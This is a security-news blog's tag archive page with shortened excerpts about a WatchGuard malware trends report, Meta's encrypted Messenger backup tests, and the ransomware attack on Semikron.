Tag: encrypted | Page 4

Decrease in malware volume, but surge in encrypted malware

September 29, 2022/in Computer Security

There has been a reduction in overall malware detections from the peaks seen in the first half of 2021, an increase in threats for Chrome and Microsoft Office, the ongoing Emotet botnet resurgence, and much more, according to a new report.

WatchGuard Technologies has announced findings from its most recent Internet Security Report, which details the top malware trends and network security threats analysed by WatchGuard Threat Lab researchers in Q2 2022.

“While overall malware attacks in Q2 fell off from the all-time highs seen in previous quarters, over 81% of detections came via TLS encrypted connections, continuing a worrisome upward trend,” says Corey Nachreiner, Chief Security Officer at WatchGuard.

“This could reflect threat actors shifting their tactics to rely on more elusive malware.”

The Q2 Internet Security Report found office exploits continue to spread more than any other category of malware.

In fact, the quarter’s top incident was the Follina Office exploit (CVE-2022-30190), which was first reported in April and not patched until late May. Delivered via a malicious document, Follina was able to circumvent Windows Protected View and Windows Defender and has been actively exploited by threat actors, including nation states. Three other Office exploits (CVE-2018-0802, RTF-ObfsObjDat.Gen, and CVE-2017-11882) were widely detected in Germany and Greece.

According the report, endpoint detections of malware were down overall, but not equally.

Despite a 20% decrease in total endpoint malware detections, malware exploiting browsers collectively increased by 23%, with Chrome seeing a 50% surge. One potential reason for the increase in Chrome detections is the persistence of various zero day exploits. Scripts continued to account for the lions share of endpoint detections (87%) in Q2.

The top 10 signatures accounted for more than 75% of network attack detections, the report shows. This quarter saw increased targeting of ICS and SCADA systems that control industrial equipment and processes, including new signatures (WEB Directory Traversal -7 and WEB Directory Traversal -8). The two signatures are very similar; the first exploits a vulnerability first…

Source…

How To Use ChatMail: One Touch Access To Security Features – Live Demo

September 15, 2022/in Video

Facebook Messenger is testing secure storage for end-to-end encrypted chats

August 13, 2022/in Mobile Security

What you need to know

Meta is testing secure backups for end-to-end encrypted Messenger chats.
Messenger will also make chats E2E encrypted by default for some people.
The company is also rolling out more tests on its E2E encrypted messages.

Meta is rolling out a number of tests to make end-to-end encryption a dominant security feature in Facebook Messenger, including secure storage to back up your end-to-end encrypted chat history.

This week, Facebook began testing a secure storage feature that makes it easier to access your Messenger conversation history if you lose your device or want to restore chat history on a new phone.

Currently, end-to-end encrypted chats are stored on your device. With secure storage, you can choose to restore your messages with two end-to-end encrypted options. One method is to create a PIN or generate a code. You can also choose to use third-party cloud services such as Google Drive to restore your chat history.

Sara Su, Meta’s product management director for Messenger Trust, wrote in a blog post (opens in new tab) that this feature “will be the default way to protect the history of your end-to-end encrypted conversations on Messenger.”

This experimental secure storage is rolling out on Android phones and iOS devices. However, the feature is not available yet on Messenger’s desktop site or application, nor is it available in chats that are not end-to-end encrypted. There is no need for you to take any action if you are a member of the test group. This will also be true when the feature is made available to everyone in 2023.

(Image credit: Meta)

In addition to secure storage, Meta is rolling out updates to Messenger’s end-to-end encrypted features.

Currently, Messenger’s end-to-end encryption is opt-in, which means you’ll need to choose to enable it. The service is now testing default end-to-end encrypted chats with some users.

Messenger is also experimenting with syncing deleted messages across your devices and verifying the authenticity of your web code when accessing the platform’s desktop site. It’s also testing the ability to unsend messages and bringing end-to-end encrypted chat features to group chats and other countries.

Meta also intends to discontinue…

Source…

German semiconductor giant Semikron says hackers encrypted its network – TechCrunch

August 3, 2022/in Computer Security

Semikron, a German manufacturer that produces semiconductors for electric vehicles and industrial automation systems, has confirmed it has fallen victim to a cyberattack that has resulted in data encryption.

“Semikron is already in the process of dealing with the situation so that workflows and all related processes can continue without disruption for both employees and customers as soon as possible,” a Semikron spokesperson told TechCrunch.

Semikron declined to disclose the nature of the cyberattack, but all signs point to ransomware. The semiconductor maker said in a statement that hackers claim to have “exfiltrated data from our system,” adding that the incident has led to a “partial encryption of our IT systems and files.” This suggests the malicious actor behind the attack has used the double extortion ransomware tactic, whereby cybercriminals exfiltrate a victim’s sensitive data in addition to encrypting it.

The Nuremberg-based group company, which claims to power 35% of the wind turbines installed globally each year, declined to say who was behind the attack nor whether it received a ransom demand. However, Bleeping Computer reports that Semikron was the victim of the LV ransomware, with the hackers apparently stealing 2 terabytes of documents.

LV ransomware has been in operation since at least 2020 and uses a modified variant of REvil ransomware, according to cybersecurity company Secureworks. According to the group’s dark web blog, which doesn’t yet list Semikron as a victim, the gang targets companies that allegedly do not meet data protection obligations.

“They rejected to fix their mistakes, they rejected to protect this data in the case when they could and had to protect it,” its dark web blog states. “These companies preferred to sell their private information, their employees’ and customers’ personal data.”

It’s unclear what data was exfiltrated from Semikron’s systems, and the company declined to say how many customers and employees are potentially impacted. Semikron has over 3,000 employees in 24 offices and 8 production sites worldwide across Germany, Brazil, China, France, India, Italy, Slovakia, and the…

Source…

Tag Archive for: encrypted

What you need to know